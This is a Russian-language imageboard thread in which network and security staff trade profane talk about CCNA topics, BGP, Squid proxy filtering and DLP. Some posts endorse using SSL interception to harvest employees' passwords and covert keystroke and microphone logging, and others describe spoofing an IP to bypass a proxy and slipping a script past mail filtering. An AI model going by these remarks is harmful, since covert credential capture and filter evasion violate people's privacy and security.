>BGP в качестве внутреннего протокола маршрутизации Это верно только для транзитных AS в контексте передачи маршрутов в интернет. Раньше была практика их передачи через IGP, но это было ну очень-очень давно. Что до iBGP, то без IGP он как бы всё равно не заработает, так что OSPF или ISIS никто не отменял внутри сети.
>>1155682 > Двачерсы, поясните мне про L2 VPN, про всякие там VPLS или MPLS и IPoE, вот с L3 VPN уровня point TO point всё ясно, есть сервер, есть клиент, начал читать про VPLS и в ужасе охуел насколько это сложно, сложнее любого BGP. > Короче, объясните как для пятилетнего, что это как и куда работает, можете подогнать сравнительный анализ, в чём плюсы и тп, вообще расскажите для тупого и с самого начала, где используется в чём плюхи в отличии от L3, я так полагаю, плюхи в том, что удобен при site to site Ты собрался идти к провайдеру?
>>1155878 >Ты собрался идти к провайдеру? Упаси боже хотя хуй его знает, что там в будущем, просто хочу разобраться с сетями на уровне CCNA, ну такой, базовый уровень сетевика чтобы стать шивой, всякие STP, OSPF можно встретить ирл, а вот л2впн с MPLS я не встречал, а ведь интересно
>>1155894 На уровне CCNA лучше не лезь даже в MPLS и BGP. Всё равно до конца сейчас не разберешься, а где-нибудь на собеседовании какую-нибудь глупость возьмешь да и ляпнешь. Некоторые вещи лучше не знать вообще, чем знать плохо.
>>1155911 >На уровне CCNA лучше не лезь даже в MPLS и BGP. Всё равно до конца сейчас не разберешься, а где-нибудь на собеседовании какую-нибудь глупость возьмешь да и ляпнешь. Некоторые вещи лучше не знать вообще, чем знать плохо. Согласен. Для уровня ЦЦНА лучше усвоить хорошенечно OSPF и разные L2 технологии. BGP, а уж тем более L2VPN не надо. L2VPN это вообще узкая провайдерская тема.
>>1155911 >BGP БГП он же такой, типа не очень, получаешь себе циферку, анонсируешь сеть за собой. ну это актуально как минимум когда у тебя целый пул белых адресов.
Давай тогда так, на каком моменте заканчивается CCNA v3 R&S, так как я уже месяц как изучаю "от забора и до обеда" А межсетевые экраны туда входят? Сейчас спустя всякие наты, транки, спанинги дошёл до динамической маршрутизации, ещё надо всякие VRRP поизучать
>>1155917 >Давай тогда так, на каком моменте заканчивается CCNA v3 R&S Я не он, но скажу от себя. Все эти "уровень CC" (вставить нужное) это довольно условное деление. Тебе твой "уровень CCNA" для чего? Для прохождения собеседований или для сдачи сертификата? По мне так уровень CCNA должен знать, что такое BGP, как его базово настроить. На этом всё. Но опять же знать что такое и реально работать с какой-то технологией на крупной сети это разные вещи.
>>1155926 >А знание всяких там VRRP и прочих протоколов виртуализации оно на каком уровне? Вообще как часто используется, только в ядре и иногда в агрегации? VRRP — Агрегация/ядро.
>>1155930 то есть для успешной работы и уровня ССНА мне достаточно уметь настроить простой VPN уровня ptp на IPSEC, уметь сделать VRRP, делать STP, делать Channel-Group делать транки, назначать вланы в том числе и нативные, включать маршрутизацию на L3 коммутаторах, делать маршрутизацию на роутере, OSPF, ACL нууууу ииииии вроде всё
А не слишком ли мало? Как бы тут изучения на пару недель-месяц, учитывая, если знаешь OSI /TCPip
>>1155934 CCNA - это на самом деле уровень первой линии техподдержки или инженера-монтажника сетевого оборудования в обязанности которого входит прописывание адресов на интерфейсах и т.п. ерунда, чтобы большие админы вообще не отрывали своих задниц в центральном офисе. Что именно входит в обязанности сильно зависит от профиля компании и от ее внутренних айти процессов.
>>1155934 >то есть для успешной работы и уровня ССНА мне достаточно уметь настроить простой VPN уровня ptp на IPSEC, уметь сделать VRRP, делать STP, делать Channel-Group делать транки, назначать вланы в том числе и нативные, включать маршрутизацию на L3 коммутаторах, делать маршрутизацию на роутере, OSPF, ACL нууууу ииииии вроде всё Ну тут понимаешь ли как...это все равно, что написать что-то вроде: "то есть для успешного ведения войны мне надо научится стрелять, читать карты, расставлять красные флажки в местах расположения армий, отдавать приказы по телефону...ну и врожде всё. А не мало? Всё это можно за неделю изучить.
>>1155934 главное понимать как это всё работает в учловиях большой сети. И зачем. И видеть когда надо использовать то, а когда это. Это только с опытом приходит.
>>1155949 >Так почему таким петухам ещё и платят по 100к? Как-то странно всё это. Потому что работа сетевиком это не "уметь настроить простой VPN уровня ptp на IPSEC, уметь сделать VRRP, делать STP, делать Channel-Group делать транки..." Это инструмент всего-лишь.
>>1155965 >>1155963 >>1155962 Вот вы разошлись, вообще всю вашу работу довольно легко описать в паре страниц: дели на вланы по отделам, если это влан для телефонов, то делай LACP (если ты ебанутый и купил цисок по 150$ за трубку, вместо фанвилов или елиноков по 50), если для видекамер, то запрещай в АЦЛ Мути линки от доступа до агрегации через порт-ченнел от агрегации до ядра по порт-ченнел+стп, ядро так вообще чисто СТП+ченнел, с вррп всё это в стек рутереров, если один двинет коней, динамическую маршрутизацию внутри по OSPF, по BGP резервный провайдер, VPN на IPsec хотя он сосёт у openvpn а дальше крути-верти обмануть хоти АЦЛ на запрет лишних портов не забудь повесить на рутер/фаерволл, а да, и всех пиздюков пользователей гони на прокси, а на АЦЛ шли нахуй весь трафик не с прокси
По оборудованию: на доступа ставим самое говно, где надо можно и не управляемое, или управляемое, типа HP 1910, ну или цисок 2960, на всякие там агрегации 3560, на ядерный можно их же, в виде NAT-a минимум 2911, ну для лохов конечно и/или филиалов, плюс пары VPN каналов, с эниконнектом, а на деле ASA, а ну и да, ДМЗ ещё не забудь нахуячить, только там реверс ещё нужен, но вы то реверс не настраивали, ладно, хуй с ним берём haproxy или squid, это можно и на L3 коммутаторе сделать отделив их от всей сети, в АЦЛ, а трафик из того влана deny нахуй, что бы обратно могли ходить только под себя
>>1155667 >Зачем тебе вообще здесь две зоны оспф? Затем, что на граничных маршрутизаторах настроены также туннельные интерфейсы DMVPN с n-ным количеством сетей удалённых площадок, у каждой своя зона. Кроме того не хочется, чтобы в магистраль анонсировалась информация о линках в каждую подсеть LAN ЦО, за исключением summary. А также не хочется, чтобы в тупиковые зоны анонсилась информация о служебных и туннельных линках. >Разрулить ситуацию можно либо с помощью... А вот за это спасибо. >>1155310 Тебе тоже спасибо за наводку.
>>1156223 > >дели на вланы по отделам > Никогда не понимал, зачем нужно это делать. Каждому отделу своя подсеть. Вообще охуеть. У нас зачем то настояли безопасники на этом. Тоже не понятно зачем.
>>1156223 >Никогда не понимал, зачем нужно это делать. Каждому отделу своя подсеть. Вообще охуеть. >>1156249 >У нас зачем то настояли безопасники на этом. Тоже не понятно зачем. Чтобы была возможность кого-то быстро пидорнуть при необходимости, продампать, проспуфить, найти откуда ноги растут. Чем больше широковещательных доменов, тем меньше широковещательных пакетов в сети, я бы вообще настаивал, что бы между подсетями закрыли все порты кроме используемых, ибо нехуй им иметь allow ip from any to any с 1 по 65535, выделил необходимое, остальное на прокси
Я плохо помню всякие PCI DSS и ISO 27000, так как читал их сто лет назад, но вангую, что там тоже было деление
Вообще в огромных корп сетях деление, конечно, идёт по филиалам, допустим 10.10.56.0/22 с делением на 24 макси на ЦО, а всякие 172.16.100.0/16 с маской 24 на филиалы
Но, конечно, надо резать все пакеты в сети от DHCP, которые не DHCP и тому подобному
>>1156278 >У Шивы! Поэтому я буду Шивой Не, шива это обо всём и ни о чём. Знает всё по чуть-чуть. И стулья чинить, и чайники, и серваки админить, и мебель перетаскивать. Нахуй-нахуй
>>1156322 Почему, нормально, когда ты можешь сам в одиночку создать всю сетевую и серверную инфраструктуру небольшого предприятия, это очень странно, что многие упоротые специалисты не хотят выходить за рамки своего кругозора, мотивируя тем, что "ко-ко я лучше буду одно знать нормально, чем два, но плохо". Можно знать хорошо и две области. А постоянно говорить, что это не по канону, просто отговорки. У меня есть друг недотянувший 10 баллов на CCNP, когда я его спрашиваю на чём DNS и DHCP будешь делать он с твёрдой уверенностью говорит, что только на циске, вообще не понимая как работает авторизация в домене шиндоус, и для чего он нужен. С другой стороны есть Я - ИБшник, обоссаный, сраный ИТ ИБшник, сукаблятьненавижуэтуработуброшуеёнахуй. Так вот, сейчас есть интересная задача - реализовать выход одного приложения в сеть минуая ASA и PROXY, но так, что бы остальные приложения не ходили, приложение использует около 10к TCP и UDP портов и бешенного количество удалённых хостов с динамическими доменами 2-3-4 уровня, открытие на ASA которых приведёт к пидорству в сети уровня торрентов, и прочиего говна, которое людям не положено. Как ИБшник я вообще нахуй шлю с такими программами, но есть запасное решение, ага, требующее знание двух областей, на случай если потребуется реализация от верховного главнокомандующего: 1. маркируем трафик конкретного приложения через ГПО, например, по TOS 2. Выпускаем на ASA по TOS-у
И таких примеров довольно много Например задача: реализовать фильтрацию контента от плохих сайтов: решение какое предложит любой вендор: блюкот аса, цена внедрения, сколько там, в районе 20к долларов, или около того Решение для "шарящего": 1. ставим SQUID + Rejik, режик не умеет в авторизацию в АД, но он охуенно лёгкий, горяздо легче сквид гварда, режим по базам режика доступ к ресурсам 2. выгружаем раз в 10-20 минут пользователей из группы кому-что можно, кому нельзя через Get-ADGroupMember "Terpili bez interneta" | Select SamAccountName > ACL.txt, подгружаешь в режик и смотришь 3. более секьюрный, но лень писать запрос, что пиздец как, через линух выгрузить пользователей домена и занести в файл, можно через тот же хелпер сквида
К чему я это, к тому, что ты должен разбираться до определённого уровня во всех областях, и только потом уходить в какую-то конкретную
>>1156350 >когда ты можешь сам в одиночку создать всю сетевую и серверную инфраструктуру небольшого предприятия Серверную и сетевую инфру небольшого предпрятия и я могу. Надо большого! С развитой сетью филиалов, СХД, виртуализацией и несколькими ДЦ.
>>1156350 >через линух выгрузить пользователей домена и занести в файл Будем честны - лучше заплатить 20к зелени за готовое решение, чем так страдать. Олсо если у тебя в AD не 100-2000 учеток, а, скажем, в компании человек 30000+ даже мысли о подобных костылях уже выглядят смешно.
>ИБшник ИМХО, безопасник - это такая белая шляпа, которая зарабатывает на баунти программах по поиску уязвимостей, а то чем ты занимаешься - обычная внутри корпоративная суета сует и томление духа. И беда вся в том, что ни предотвратить, ни отразить целенаправленную атаку на свою компанию, ты вряд-ли сможешь...
>>1156361 >>1156350 >можешь сам в одиночку создать всю сетевую и серверную инфраструктуру небольшого предприятия Только вот ни в одну составляющую инфры большого предприятия такой "специалист" уже не сможет и это печально, т.к. сильно ограничивает развитие и карьерный рост. Переходить к новой отрасли имеет смысл либо когда достиг предела в своей, либо если она находится где-то на стыке и ее освоение реально умножит твою ценностью, как специалиста.
>>1156358 Если кто-то имеет полный доступ у сквида или выше выданных тебя, можно просто подделать, по умолчанию люди делают что у 99% без ограничений идет у сервера прокси и просто подделываем запросы, прикидываемся что у нас ойпи как у сервера. По умолчанию, программ долбящих сквид вагон тот же проксифаер
>>1156370 прочитал что такое баг баунти. ИМХО безопасник в российский реалиях это тот, кто пишет всякие бумажки и внедряет решения для того, чтобы закрыть жопу предприятия перед всмякими контролирующими органами. В довесок к этому следит, чтобы сотрудники не спиздили базху данных клиентов.
>>1156371 Вообще эта тема весьма прибыльная, если ты реально шаришь в безопасности, а не просто хуй из отдела безопасности очередного средне-энтерпрайза. Регаешь на https://www.hackerone.com и получаешь по 100-300 баксов даже за весьма тривиальные уязвимости. Есть целые гайды для новичков: https://krober.biz/wp-content/uploads/2017/03/web-hacking-101.pdf - сам я не из этой области, но немного почитал эту книжку, т.к. сейчас небольшой сайт внутри компании задеплоил...
>>1156374 Ну от квалифицированного хакера ВНУТРИ компании (особенно внутри отдела IT или безопасников), увы, защититься нельзя. Спасает только одно - никто не пойдет на такой риск, т.к. вознаграждение в случае успеха недостаточно высоко по сравнению с наказанием в случае провала.
У нас всё секурно! @ vpn - скомпроментированный pptp @ база 1с в которой все всё в первый день распечатывают список клиентов и получают пизды(если увидят)
>>1156361 >Надо большого! С развитой сетью филиалов, СХД, виртуализацией и несколькими ДЦ. Ты пишешь как буд-то это что-то страшное, и никогда не настраивал. У меня был знакомый, который занимался виртуализацией, ещё в институте, такая пшука вообще, он рассказывал, о "гениальном решении", когда их серверу понадобилось больше 500гб ОЗУ, а денег не было, они сделали страйп из двух ССД и поместили на него ОЗУ той виртуалки, просто пушка, ну охуеть, выдумщик, а на деле даже адресацию в сетях не понимал, это всё херня, так же как и резервный ЦОД, впн уровня поинт ту поинт, скорее всего, почему-то я вангую, что 70% здесь сидящих сетевиков не расскажут о том как работает IPsec, а вопрос то прикладной в их области
>>1156363 >Будем честны - лучше заплатить 20к зелени за готовое решение, чем так страдать. Олсо если у тебя в AD не 100-2000 учеток, а, скажем, в компании человек 30000+ даже мысли о подобных костылях уже выглядят смешно. Да, готовое решение всегда лучше, но с ограниченным бюджетом, бесплатное не сильно и хуже, разве, что ГУИ нет, и иногда ошибки на ССЛ бамп, от которого можно вообще отказаться и делать только пики степ1, если у тебя нету ДЛП Костыль - решение для режика, так как он не умеет в АД, а на сам сквид нету блеклистов, точнее есть, но оно совсем не подходит под наш регион, плюс сквид, если ты не знаешь, с версии, кажется 3.4 перестал понимать такие ACL, где содержится домен первого и домен второго уровня, он выдаёт ошибку, типа или блокируй первого уровня или второго, а два сразу нельзя. Из-за этого используют редиректоры. Сам squid умеет авторизоваться в АД, как я и написал, можно через хелпер сквида брать пользователей для редиректора >ИМХО, безопасник - это такая белая шляпа, которая зарабатывает на баунти программах по поиску уязвимостей, а то чем ты занимаешься - обычная внутри корпоративная суета сует и томление духа. И беда вся в том, что ни предотвратить, ни отразить целенаправленную атаку на свою компанию, ты вряд-ли сможешь... Это не верное представление, безопасник - обратное от хацкера, ты должен уметь хацкать, что бы предотвратить, ну я про ИТ безопасника, но моя работа говно, и я уволюсь
Кстати, я ИБшник в конторе с 10к пользователями и 6к рабочими станциями, я тебе больше скажу, несмотря на размеры, мы не ГОС, денег на ИТ выделяется крайне мало, поэтому и рождаются такие костыли
Кстати, в своё время был админом в одном из банков, так и там была связка блюкота с сквидом, ага, ага, из экономии, мань
>>1156369 Суть в том, что бы в крупной конторе уметь давать рекомендации. Если подрядчик наделал хуйню, а ты не компетентен это проверить, то это - твоя проблема Не надо быть админом всего, надо уметь это делать, и понимать где кто-то может обосраться. И это важно ещё для того, что бы другие отделы или подрядчики тебе не вешали лапшу на уши по поводу сложности задачи Живой пример: подрядчик предлагает сделать шифрование каналов между нодами готового решения, цена вопроса 200к, решение - 3 команды из openssl, которые он мог бы ввести сам за 200к, или, которые ввёл я, сэкономив деньги компании, получив приятный бонус в конце квартала
>>1156382 БЕЗОПАСНИК УХОДИТ ПИТЬ ЧАЙ @ СЕТЕВИКИ ВКЛЮЧАЮТ НА ФАЕРВОЛЛЕ ПРАВИЛО ALLOW ANY TO ANY @ ВИНДУЗЯТНИКИ ДОБАВЛЯЮТ ВСЕХ В ДОМЕННОГО АДМИНА @ ЛИНУКСОЙДЫ ВКЛЮЧАЮТ АВТОРИЗАЦИЮ ОТ ROOT С ПАРОЛЕМ ROOT @ ЭНИКЕИ УДАЛЯЮТ АНТИВИРУСЫ @ БУХГАЛТЕРА НАМАТЫВАЮТСЯ НА АМИГО @ МЕНЕДЖЕРЫ СКАЧИВАЮТ ДЕТСКОЕПОРНО.EXE @ СЕКРЕТАРИ ЗАСОВЫВАЮТ ФЛЕШКИ ВСЕХ ПРИХОДЯЩИХ ЛЮДЕЙ В КОМПУХТЕР @ ПАРОЛЬ ОТ SQL ТЕПЕРЬ "*"
>>1156391 >ты должен уметь хацкать Я таких безопасников еще нигде не встречал. Что логично, ведь если ты рили можешь хакать, то на копеечном окладе в черте-какой компании сидеть не будешь.
>squid умеет авторизоваться в АД Ну мы так сейчас доебемся до того, чтобы сами весь нужным нам функционал на пайтоне написать с нуля. То же взаимодействие с AD я, например, уже делал неоднократно, правда это было на java, но суть та же. Кто вот только потом сможет такие решения поддерживать, после увольнения изобретательного админа?
>>1156405 При чем тут керберос то? Задача вроде была получить пользователей, а заодно еще и привязку имени пользователя к имени компа и IP. Иначе нахуй вообще с AD взаимодействовать?
>>1156400 >Я таких безопасников еще нигде не встречал. Что логично, ведь если ты рили можешь хакать, то на копеечном окладе в черте-какой компании сидеть не будешь. У меня не копеечный оклад, и я не в хуле какой, а известной по всей РФ конторе, просто работа говно, мне нужна или абсолютная власть или веселье, а тут я 90% времени ебалом в длп, хуйня полная Ну надо понимать, что 100% защиты от атак не бывает, например, когда 2 года назад нашли уязвимость в цисках, ей воспользовались злоумышленники, и хацкнули один банк, где работал мой друг, с выводом средств, и это была вина ЦИСКО, поскольку у банка был пройден PCI DSS, и соблюдены все меры Равно как и нельзя защититься от спуфинга в подсетях, так как хацкер может прийти и засунуть устройство в патчкорд между ПК и сетевухой, ну варианты
У сквида есть хелперы, зачем что-то писать на питоне, они есть из коробки
>>1156405 - это другой анон, но он прав, про керберос
squid - умеет работать с AD, умеет авторизоваться, умеет смотреть пользователей, и работать с группами и подгруппами, конфиг для примера выше
rejik или squidGuard - доп софт, который ставится в связке с сквидом, он НЕ умеет работать с АД
Если ты ограничиваешь трафик по написанным или найденным тобой блек-листам через сквид, то проблем нету
Если ты для удобства берёшь готовые блек листы с миллионами сайтов по категориям, например шелладб http://www.shallalist.de/ , то это говно с сквидом без сквидГварда не работает Отсюда и появляются такие костыли
Если у тебя стоят правила, уровня: можно только 5-50 сайтов, остальное нельзя или фулл, тогда обычный сквид без надстроек и всё, этого более чем
>>1156415 >Сквид вообще в глаза не видел. ну пиздец блять, ну пиздец, ну сука, ну пиздец, вот с этого я прямо подгорел, ну ты и блять пиздец > ругает > не пробовал ну блять, ну и нахуй
У TMG нету ICAP, у нас актуально для DLP в разрезе наличие ICAP
И вообще зря, сквид очень крут, ты думаешь, почему в 90% случаев или бесплатный сквид или платный блюкот, потому, что остальное - мусор Плюс у сквида просто божественное масштабирование, в буквальном смысле скопировал машину с сквидом - вторая прокси, ещё раз - третья, и всё, только переименуй и готово
А, ну и последнее, я тебе рассказал только про сквидГвард, а у сквида сотни плагинов и доп фич, анализатор логов - кто куда ходил, пожалуйста - sarg/lightsquid, посмотреть активные соединения - sqstat Хочешь - делай в коннект, хочешь в транспарент, хочешь задавай формат логов, хочешь исключай из логов, балансируй трафик, делай реверс, фильтруй по контенту (музыка, фото, видео), работа с регулярными выражениями Короче, сквид в буквальном смысле умеет всё, только имеет проблему с плохо подписанными сайтами, так как базируется на сертификатах мозиллы
>>1156431 >вот с этого я прямо подгорел Ну так я совсем и не безопасник, лол.
>DLP ICAP Как одно с другим вообще связано? Никакой DLP не помешает подключить жесткий диск рабочего компа к мобильному телефону через sata-usb переходник и внешний источник питания. Или вы шифруете диски всех пользователей? А ICAP - это, вроде, совсем из другой оперы, про перенаправление проксируемого трафика для проверки на вирусы.
DLP, например симантек, на котором я сижу, имеет модули: эндпоинт (ставится на конечные точки, встраивается в браузеры, в драйвера USB и всего всего) Network (отправляют трафик с прокси сервера на проверку, да, да ССЛ, про сслбумп я тебе писать не буду гугли сам), модуль распознования картинок (забыл название, но как-то так) и модуль сетевых шар, который маркирует все файлы на шарах
Вот эндпоинт ставится, как я писал выше в разрез всего I/O твоей системы, от флешек, до клавиатуры и принтеров Единственный вариант - фоткать монитор
Сириусл, а политики опознавания телефонов задаются регулярными выражениями. Пример:
слушай, поговорил с тобой, и таки думаю, что надо бы мне работу менять, вроде не очень-то я и тупой, а то постоянно кажется что знаний на нормальное место не хватит :((((
>>1156556 А чем PaloAlto не замена? NGFW как-никак, плюс по подписке базы для фильтрации плохих сайтов, сетевых сервисов и проверки трафика на вирусную, ну и своя собственная песочница в придачу. Всё было бы совсем хорошо, если бы это дело настраивали не наши безопасники, а знающие люди, лол.
>>1156563 >SSL BUMP Ну пальто тоже это умеет, разумеется, если есть возможность подменить пользовательский сертификат всем сотрудникам (нельзя, потому что у топчиков личные маки / айфоны, которые должны работать в корпоративной беспроводной среде на всех площадках).
>DLP У обычных пользаков семерка с секретнетом - вот и всё DLP. Про то, что проверки секретнет отключаются локально при наличии локальных админских прав, ты и так знаешь, равно как и что получение этих прав предотвратить невозможно при физическом доступе к компу. А про то, что у этих пользаков нет никакой чувствительной инфы (в отличие от топчиков) я молчу.
>фоткать монитор Ну это если данные вообще не сохраняются локально на компе, а если сохраняются - выкручивай его, да копируй до посинения.
Интересно, кстати, как почтовый сервер у вас обрабатывает вложения с зашифрованными архивами и всякие rarjpeg-и... У нас - никак, на днях коллеге ps1 скрипт в шифрованном zip-е успешно отправил... Да чего там, можно было даже письма без авторизации отправлять(!) пока я не заметил и не рассказал. Мне не верили, пока не прислал письмо с чужой корпоративной почты. Такие вот реалии безопасности. И я рад, что не отвечаю за нее никаким образом.
У тебя синдром самозванца - ты явно разбираешься в своей области, не бойся нихуя и ищи работу себе по душе.
>>1156580 >У тебя синдром самозванца - ты явно разбираешься в своей области, не бойся нихуя и ищи работу себе по душе. Наверное ты прав, у меня просто есть пару друзей нинздей, рядом с которыми я кажусь обычным эникеем
Вообще под вафлю надо бы выделить в этом случае отдельную подсеть, и отделить от бампинга, у наших топов вообще почти нет отношения к корп сети, только выделенные сервера в европе с функцией физического уничтожения, хотя кто их проверит. Вообще вайфай устройства в корп сети - моветон, в крайнем случае WPA2 через радиус, и то всё равно лучше нахуй Бампать трафик ещё полезно для логинов/паролей, что бы собирать инфу по своим сотрудникам, в случае каких-то проблем, проверить кто что ворует, откаты и тп
По поводу ДЛП, можно, да, вытащить хард и открыть на другом ПК, 100% защиты нету при любом раскладе
У нас крупная сеть с миллионами клиентов, самое главное у нас персональные данные клиентов, как оператор ПерсДан согласно фз152, у нас воровство клиентов с стороны сотрудников, отсюда и есть политики на запрет копирования телефонов, шифрованных архивов, и тп Мы лочим копирование шифрованных архивов через саму ДЛП, там есть утилита, которая делает аля слепок типа файла, и дальше, его можно переименовывать, изменять, но слепок будет один на все. Например теги винрара, взятые с оф сайта, хотя такие теги можно и самому написать, просто сняв слепок с программы:
А вот винзип $Int1 = getHexStringValue('377ABCAF271C0004'); $Int2 = getBinaryValueAt($data, 0x0, 8); assertTrue($Int1 == $Int2);
Почтовый сервер ходит через тот же сквид с бампом, сертификат корпоративный, купленный в комодо, поэтому трафик нашей почты мы можем открыть и подписать, доступ к ОВЕ есть, остальные доступы, типа активсинка нету, для подключения из дома ВПН с РДП, РДП следит и мониторит ДЛП
>>1156588 >для логинов/паролей Вот это уже опасное дело. Т.к. если что-то пойдет не так, то пользователь сможет засудить компанию за вмешательство в частную жизнь. И, насколько знаю, даже если у сотрудников в трудовом договоре прописано, что нельзя использовать рабочий инет в личных нуждах - это не дает права снифать пароли/инфу пользаков, которая не относится к их непосредственным рабочим обязанностям. При том попасть можно очень больно - у нас как-то дедка уволили незаконно, а у он оказался корешем одного крупного политика и блядь такие проверки на компанию натравил, что с ним еле договорились потом...
Про rarjpeg ты так и не ответил, кстати...
>Наверное ты прав, у меня просто есть пару друзей нинздей, рядом с которыми я кажусь обычным эникеем Ну так это ж наоборот хорошо - есть у кого учиться. Сам тоже собираюсь уходить, но как раз в т.ч. и потому что рядом ниндзей нет.
>>1156598 >Про rarjpeg ты так и не ответил, кстати... Я не пробовал с ним, это интересный вопрос, можно протестить, у тебя нету под ругой раржепега, так как делать его сейчас самому, ну пиздец как лень
По поводу сбора личной информации у нас в внутренний политике ИБ, которую подписывают все, на 50 страницах 12 шрифтом написано, что-то уровня, что "компания имеет право обрабатывать любые данные, которые вы обрабатываете средствами компании", "вы даёте своё полное согласие на обработку и передачу своих персональных данных", я не помню точный текст, но оно есть. Да, сотрудники про это не знают, как правила почты уровня гугла с двухфакторной авторизацией мы не смотрим, ну я не буду тебе рассказывать, что мы смотрим, а что нет, это не суть, да, по большей части не палимся
Ещё юзаем софт, который записывает каждый клик мышки и каждое нажатие пользователя на клавиатуре с скринами, плюс микрофон, можете купить 10-15 лицензий и ставить на ПК подозреваемых
>>1156608 Раржпег - пикрелейтид. Там внутри текстовый конфиг от q3.
>в внутренний политике ИБ, которую подписывают все, на 50 страницах 12 шрифтом написано Так в том и фишка, что если то, какой-то пункт договора противоречит законам/конституции РФ, то он будет признан не действительным! А во всех этих юридических тонкостях хуй разберешься. Многие компании пишут туда белиберду, чтобы людей больше припугнуть.
Надо было на убунту 16 настроить xrdp пиздец 2 дня как об стену. Не работает русская раскладка и все. Я в ахуе просто, интернеты завалены похожей проблемой аж с 2009 года но никто нихуя ничего не поправил.
Пацаны, вечер в хату. Будьте так добры, выручите советом. Необходимо получить знания по ЛВС. Имеется книга семейки Оливеров (Компьютерные сети). Так вот, годное чтиво или нет? Может лучше что то новее начать изучать? Я сам электрик, и по работе свалилось на меня сетевое оборудование. Имеется оборудование которое работает по PRP протоколу. Так вот, накидайте плиз чего можно почитать, что бы въехать ЛВС, желательно с азов, дабы ничего не пропустить.
>>1156743 >Это ещё что за херня? >Ты ничего не путаешь? Я даже с гуглом не смог до конца понять о чем ты. Лол я тоже не понял про что он, гуглю, тоже не понял. Ну лан думаю я долбоеб наверное. А оказывается нет. Может опечатался.
>>1156747 >Лол я тоже не понял про что он, гуглю, тоже не понял. Ну лан думаю я долбоеб наверное. А оказывается нет. Может опечатался. Я-то сетевиком работаю, но не слышал про >PRP
>>1156743 >По теме — курс ICND 1 и ICND 2 Это я так понимаю за деньги? Мне бы пока что бесплатно начать въезжать. >>1156745 >Ты ничего не путаешь? Я даже с гуглом не смог до конца понять о чем ты. Parallel Redundancy Protocol. >Спорное произведение. Так стоит ли читать? Может чего поновее изучить? Не хочется время зря терять. Может в ЛВС есть какой-нибудь must have?
>>1156760 >Это я так понимаю за деньги? >Мне бы пока что бесплатно начать въезжать. Не, можно скачать на торрентах. Есть вроде бы на русском. Т.к ты не сетевик и тебе скорее всего не нужно углубляться в работу всяких протоколов маршрутизации, достаточно будет этого. Или книгу по подтоговке к CCNA можешь погуглить. А можешь посмотреть на ютубчике СДСМ, первые 6-7 видео
Ухватил за 12 баксов на год vps неплохую, два выделенных ядра проца, столько же гигабайт оперативы, 1 терабайт трафика на месяц, 50гб жёсткого диска. Но вот беда, виртуалка средствами openvz, и ещё ядро сверхдревнее.
С учётом вышесказанного, как мне добиться изоляции внутри этого сервера? Обычно я пердолю либо lxc либо докер, но внутри openvz это как я понимаю не вариант, да? Что ещё для изоляции можно использовать?
>>1156967 Чего именно? Там куча контроллеров нижнего уровня, сервера среднего уровня, сервера скады, свичи руджеткомы и т.д. И все это объвязанно по PRP. >>1156968 Cisco нет.
>>1156633 >>1156626 Абу пофиксил после того как так стали обмениваться центральными процессорами Вообще так до сих пор обмениваются центральными процессорами, только не на аиб
>>1157010 BGP - протокол для чего? Для обмена маршрутной информацией между автономными системами. Это его основное предназначение. Внутри AS нет никаких других AS (конфедерации мы сейчас не рассматриваем), поэтому iBGP внутри AS используется только для передачи маршрутной информации полученной из внешних AS, т.е. предназначение iBGP - помогать работать eBGP, они всегда работают в связке и iBGP отдельно применяться просто не может. Соответственно, внутри AS мы всё равно используем какой-то из протоколов IGP, чтобы наша сеть была сетью, а не набором узлов и проводов.
Если вдаваться в технические детали, то для BGP, как и для любого другого протокола маршрутизации критически важна доступность next-hop. Если он недоступен, то маршруты ни в RIB, ни в CEF никогда не попадут. Что такое next-hop для eBGP? Это сосед от которого были получены маршруты, т.е. мы проверяем фактически достижимость соседней AS. Для eBGP всё понятно: если некст хоп недоступен, маршруты от него пропадут после падения сессии. А кто будет для маршрутизатора iBGP next-hop? Классический вариант: next-hop будет всё тот же внешний сосед(!) и специальный случай: можно перенастроить пограничный eBGP/iBGP маршрутизатор, чтобы он указывал в качестве next-hop самого себя.
Так вот в классическом случае, чтобы маршруты полученные по BGP попали в RIB/CEF важно, чтобы next-hop УЖЕ был доступен на всех iBGP маршрутизаторах, а как это может быть, если информация о нем приходит по самому iBGP? Никак. Значит, мы должны ее получить по IGP протоколу! Т.е. на нашем граничном BGP маршрутизаторе н>>1157010 ужно сделать редистрибьюцию BGP next-hop адреса (и только его!) в IGP протокол, где указать, что этот самый next-hop внутри нашей сети доступен через наш же пограничный BGP маршрутизатор.
>>1157064 Лучше б он капчу пофиксил, мудень, блядь, а от стеганографии всё равно нет способа защититься.
>>1157069 >из протоколов IGP, чтобы наша сеть была сетью, а не набором узлов и проводов. IGP внутри сети не используем, потому как топология звезда, где ЦОД в центре. Статика используется в основном.
Какой-то блять пиздец это ебучее IT, работаю сисадмином(по сути devops+хуй с картриджами(у нас нет офисного админа в конторе занимающейся бусиносом в IT сфере(не буду до конца палиться) меняем даже двери в офисе (это очень палит)) - утром выкладываешь сервисы, ебешься с докерами хуекерами, пишешь ебаный код, конфиги которые рендерят другие ебучие конфиги, лепишь мониторинг, алертинг, ищешь ошибки в коде разработчиков, потому что ты блять эксплуатация и видишь это первым, ночью будят потому что твой ебаный алертинг работает, а код нихуя, приходишь утром - бухгалтерия доебывается со своим 1С, потому что у них там какие-то ебаные блокировки с файловым 1С за который тебе не платят, и вообще есть аутсорсер(причем ебут очень настойчево), и все ездят по ушам, и думаешь такой - нахуй блять вообще ввязался в эту ебучую работу, а когда, блять, наебнется какой нибудь ceph - админы будут крайними и хуями будут крыть опять их, в пизду пацаны лучше ни за хуя не отвечать, продавать смартфоны в связном и жить с мамкой, отвечаю.
>>1157147 потому что на шеяке девушка, квартира и 4 кота, нужно ебашить и не отвлекаться, при перебежке на др место работы можно неприятно влететь, в общем я трусливая блядь, но выход действительно один.
>>1157148 Только и читаю "круто, модно, молодёжно!". А аргументов не вижу. Только проскальзывает иногда "Да тут ТАКОЕ можно забабахать! Ух!" Но мне вот не нужно "такое". Мне нужно, чтобы был единый стандарт и всё работало как часы без танцев с бубном. Без всех этих "ой, уефи не понимает нтфс, но у меня образ больше 4Гб, щито же делать?! А, знаю, я создам посредника на одном разделе с фат, а сам образ запишу на нтфс, отключу Secure boot, для этого воспользуюсь тремя утилитами, командной строкой и скриптами на павершелле! Вау, какой я крутой! Такого франкенштейна собрал! УЕФИ КРУТО! УЕФИ ФОРЕВА! УРА! УРА! УРА!". С биосом-то всё проще: взял образ, установил его на флешку. Всё. Не успеваешь почувствовать себя крутым хацкером.
Блядь, маму абу ебал с этими бесконечными вывесками, знаками и прочим дерьмом.
